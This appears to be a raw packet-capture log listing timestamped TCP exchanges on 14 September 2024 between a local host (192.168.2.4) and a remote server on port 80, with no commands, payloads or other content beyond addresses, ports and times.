                                        Sep 14, 2024 18:31:36.889566898 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.889662027 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.889695883 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.889715910 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.889729977 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.889822006 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.893294096 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.893326998 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.893384933 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.971800089 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.971831083 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.971853018 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.971893072 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.971930981 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.971966982 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.971976995 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.971982956 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972026110 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.972033978 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972048998 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972064972 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972099066 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.972795010 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972848892 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972863913 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972868919 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.972882032 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.972907066 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.973320007 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.973335028 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.973360062 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.973371983 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.973372936 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.973392010 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.973407030 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.973414898 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.973455906 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.974436045 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.974503994 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.974637985 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.974653006 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.974668026 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.974683046 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.974698067 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.974700928 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.974715948 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.977063894 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977080107 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977087975 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977102041 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977118969 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977143049 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.977152109 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977211952 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977227926 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977243900 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977258921 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977266073 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.977266073 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.977276087 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977292061 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.977296114 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.977323055 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.991260052 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.991286039 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.991300106 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.991313934 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.991349936 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:36.991369009 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.991559982 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.991575003 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:36.991609097 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.012923002 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.012974024 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.012978077 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.013010979 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.013062954 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.024812937 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:37.024992943 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:37.060724974 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.060780048 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.060812950 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.060833931 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.060869932 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.060902119 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.060923100 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.060935974 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.060967922 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.060986042 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.061044931 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061094999 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.061115980 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061148882 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061181068 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061196089 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.061496019 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061527967 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061553001 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.061562061 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061595917 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061626911 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.061630011 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.061686039 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.061968088 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062038898 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062088013 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.062150955 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062186956 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062221050 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062232971 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.062253952 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062287092 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062299967 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.062340021 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062375069 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.062392950 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.062994957 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063025951 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063045979 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.063077927 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063110113 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063160896 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063193083 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063205957 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.063205957 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.063227892 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063260078 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063275099 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.063298941 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063349962 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.063963890 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.063996077 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064030886 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064049959 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.064084053 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064131975 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.064133883 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064167976 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064199924 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064215899 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.064232111 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064250946 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064275980 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.064956903 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.064990997 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065025091 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065035105 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.065073013 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.065076113 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065126896 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065159082 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065174103 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.065192938 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065226078 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065242052 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.065262079 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065310955 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.065907955 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065941095 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.065989017 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.065993071 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066025972 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066077948 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.066077948 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066112995 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066145897 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066164970 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.066179037 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066212893 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066225052 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.066865921 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.066920996 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.079838991 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.079893112 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.079924107 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.079957962 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080008030 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080040932 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080049038 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.080049038 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.080073118 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080096960 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.080195904 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080245018 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.080246925 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080281019 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080312967 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.080326080 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.101500034 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.101552010 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.101587057 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.102073908 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.102107048 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.102140903 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.102174044 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.102238894 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.102238894 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.149360895 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149414062 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149446964 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149477959 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149528980 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149560928 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149595976 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149595022 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.149595022 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.149595022 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.149629116 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149662971 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149683952 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.149697065 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149730921 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149754047 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.149764061 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149774075 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.149799109 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.149854898 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.150155067 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150187969 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150221109 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150276899 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.150290966 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150326014 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150377035 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150377989 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.150410891 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150445938 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150470018 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.150494099 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.150712013 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150841951 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150892973 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150897980 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.150928020 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150959969 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.150979996 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.150991917 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151026964 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151060104 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151084900 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.151093006 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151103973 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.151496887 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151546955 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151555061 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.151582003 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151612997 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151665926 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151667118 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.151699066 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151732922 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151753902 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.151765108 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151773930 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.151798964 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151832104 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.151854992 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.151865959 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152405977 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152460098 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152466059 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.152499914 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152550936 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152553082 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.152602911 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.152606010 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152640104 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152672052 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152693033 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.152707100 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152792931 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152826071 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152848959 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.152861118 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.152868986 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.153451920 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153485060 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153537989 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153539896 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.153592110 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153642893 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153645992 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.153676987 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153695107 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.153711081 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153743029 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153764963 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.153775930 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153810024 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153845072 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.153863907 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.154401064 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154434919 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154459953 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.154480934 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.154489040 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154521942 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154573917 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154573917 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.154623032 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154656887 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154675007 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.154687881 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154721022 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154752970 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154773951 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.154788017 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.154797077 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.155349016 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155421972 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155455112 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.155457020 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155508041 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155509949 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.155543089 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155576944 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155611992 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155632019 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.155643940 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155653954 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.155678034 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155713081 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.155731916 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.155745983 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.156254053 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.156287909 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.156320095 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.156321049 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.156338930 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.156356096 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.156409979 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.168732882 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.168813944 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.168884039 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.168915987 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.168947935 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169001102 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169033051 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169060946 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.169066906 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169099092 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169131994 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169163942 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169197083 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169215918 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.169215918 CEST4973980192.168.2.445.201.245.153
                                        Sep 14, 2024 18:31:37.169229984 CEST804973945.201.245.153192.168.2.4
                                        Sep 14, 2024 18:31:37.169253111 CEST4973980192.168.2.445.201.245.153
